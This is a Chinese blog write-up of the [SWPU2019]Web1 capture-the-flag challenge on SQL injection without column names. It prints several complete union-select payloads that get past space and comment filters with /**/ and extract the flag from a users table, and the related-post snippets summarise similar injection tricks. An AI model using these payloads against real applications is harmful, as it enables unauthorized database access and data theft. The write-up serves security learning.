[SWPU2019]Web1--SQL注入无列名注入

最新推荐文章于 2023-01-05 20:28:09 发布
最新推荐文章于 2023-01-05 20:28:09 发布
阅读量256 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/117792599
版权

前言大佬wp:无列名注入
解题:
前面正常注册然后有个提交广告的。
一开始还被这个id迷惑了,以为这里有注入口,后面反应过来这只是个创建页面的编码。
在这里插入图片描述进入正题:
这里发现他过滤了许多函数。和–,#;空格也被过滤了,我这里用的/**/来绕过,除了这个(),/!* */也可以
一时间不知道怎么爆出来表名。后面发现mysql会有默认的users表。
所以这里主要用到了无列名注入。
那么首先就是猜user库里面有几列了。
命令:
-1'/**/union/**/select/**/1,2,(select/**/1/**/from/**/(select/**/1,2,3,4/**/union/**/select*from/**/users)p),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
发现4列报错了,那就挨个减。直到成功。
在这里插入图片描述-1'/**/union/**/select/**/1,2,(select/**/1/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)p),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
又说字太多了不能用一列表示,那就用group_conat()。
在这里插入图片描述-1'/**/union/**/select/**/1,2,(select/**/group_concat(1)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)p),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
好的把前面的序号爆出来了。
在这里插入图片描述注意3两边的是``这个符号不是’’。就爆出来flag了。
-1'/**/union/**/select/**/1,2,(select/**/group_concat(3)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)p),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
在这里插入图片描述
写法2:
这里又想到之写的一题,它把上面那个符号过滤了,那么要怎么绕过呢?
把序列号换一下名字就好了用as。一样能爆出flag。

-1'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)p),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述总结:无列名注入还是太不熟了。

熊是本熊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
select时没有指定确切的列名
11-03
SqlServer select时没有指定确切的列名的解决办法
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
SQL注入之无列名注入
weixin_46330722的博客
11-10 4076
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和列名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 sys数据库 在5.7以上
sql 无列名注入
xiaolong22333的博客
06-05 673
所谓无列名注入,就是不需要知道列名就能得到数据,通常都是过滤了information,让你无法得到列名 比如下面这个表,当我们不知道列名的情况下要如何得到flag呢?可以通过union来这么做 将user表的原本的3列名字变成1,2,3,将第3列别名为b,然后查询b列 buu上的[SWPU2019]Web1就是这种 但如果过滤了union这么办?还可以用join来注入,这次国赛就是这样(只可惜比赛时我还不会join,没做出来,下定决心赛后好好学学,于是就有了这篇文章。) join 连接两张表 using
[SWPU2019]Web1(无列名注入
paidx0
08-30 387
每天一题,记录学习 题目有几个地方把我坑惨了,哈哈哈 首先试了一下注册一个admin账号,然后就发现admin已经被注册 然后就开始试了一堆admin的密码进行爆破,人傻了,考点压根就不在这。 直接注册一个号进去看看 发布广告的位置又让我想起了 XSS,然后就又上当了 其实这是一道SQL注入的题目,太坑了吧 通过简单的测试,过滤了空格,or,and,--+,#等等 因为这里过滤了 or,所以information_schema库自然是也用不成了,所以就用到了无列名注入方式 具体用法可以看看我的另
2021-7-26 [SWPU2019]Web1 知识点:mysql无列名注入
m0_51326092的博客
07-26 404
文章目录前言前置知识解题过程总结 前言 其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无列名注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种) 借鉴的大佬博客: https://www.cnblogs.com/wangtanzhi/p/12241499.html https://www.cnblogs.com/Lee-404/p/128
campus-recruitment-guidance:柚柚子帮校招指导服务平台,SWPU-2017级-码之泪殇毕业设计
04-01
整个平台包含微信小程序端和web 管理端两部分,项目开发采用前分割分离,这里是嵌入式项目工程,基于SpringBoot构造,对接为小程序提供数据接口服务。涉及的技术栈: SpringBoot->初步基础环境Shiro->安全框架JWT->...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
swpu-jxcManageSys:进销存管理系统,包括了页面权限,用户管理,商品入库出库等操作
03-26
西油进销存管理系统技术栈前端技术栈: vue2 + vuex + vue-router + webpack + ES6 / 7 + less + element...项目运行之前,请确保系统已经安装以下应用: (1),node(6.0及更高版本)。使用细节,请参考: 开发: npm
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2723
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
【SQL】无列名查询表中数据
leekos的博客,分享web安全相关知识~
01-05 1885
【SQL】无列名查询表中数据
BUUCTF-[SWPU2019]Web1(bypass information_schema,无列名注入
qq_44657899的博客
02-25 2019
登录进去后,首先尝试了union注入,但是发现空格被过滤,于是使用/**/绕过。 然后判断列数,但是发现注释符被过滤了,无法使用,于是在SQL语句后加一个单引号闭合后面的语句limit 0,1;'。 由于or被禁用,所以order by也无法使用,改为group by,'/**/group/**/by/**/22,' 最后判断出列数有22列,回显位置为2和3. title='/**/union/...
sql 列名无效
男神的专栏
05-18 6405
在SQLServer2008中,当设计(修改)表结构之后,再用SQL语句时,列名会显示无效,但执行可以通过 如下图: 原因是SQL Server的intellisense(智能感知功能)需要重新整理一下,用快捷键Ctrl+Shift+R即可 关于intellisense(智能感知功能)的主要功能,就是在用户具有权限的前提下, 在Query Editior中输入架构并加上"."符号后就可以看到架构下的表、视图和用户函数了, 当用户继续输入表名或视图名并加上"."符号后就可以看到表和视图中的字段列表 ...
SQL Server 列名不存在的问题
逗比青年程序员
11-06 3705
[Err] 42S22 - [SQL Server]列名 'XXXXXX' 无效。 判断表中是否存在该字段 1、如果没有那么新建字段 2、如果已经存在该字段,判断查询条件的值是否是单引号,sql server中查询字符串必须是单引号
sql注入漏洞表(列)名的暴力破解
weixin_44720762的博客
04-21 2219
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于对表(列)名的暴力破解任处于摸索于尝试阶段,对于许多概念与知识认识任然存在不足。此博客亦是只起到对现所学知识的一个记录。所以只起到一个阅读和借鉴的作用,并不建议读者用作专业知识学习。 学习和了解表(列)的原因 在本篇博客之前,首先应该清楚为什么有必要去了解和学习对于表(列)的暴力获取。要知道多数情况下是完全可以构造pa...
列名注入和pow()溢出报错注入
7hinkSource的博客
04-28 1157
列名注入注入时,有可能会遇到过滤掉or的情况,这样information_schema就不能用了,这时候我们可以采用无列名注入。 union select会在查询的查询的数据的最后添加联合查询的数据: 我们先用这个方法生成一个虚拟表,生成的虚拟表的列名为1,2,3,并在这个虚拟表里查询数据(虚拟表需要命名,否则会报错) 反单引号表示列名或者表名 pow()溢出报错注入 pow(x,...
mysql注入 join_sql注入(利用join进行无列名注入)
weixin_39622217的博客
01-28 897
select 1,2,3 union select * from sc;select `1` from (select 1,2,3 union select * from sc)a;select `2` from (select 1,2,3 union select * from sc)a;select * from sc;select 1,2,3 union select * from sc;s...
[SWPU2019]伟大的侦探
最新发布
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值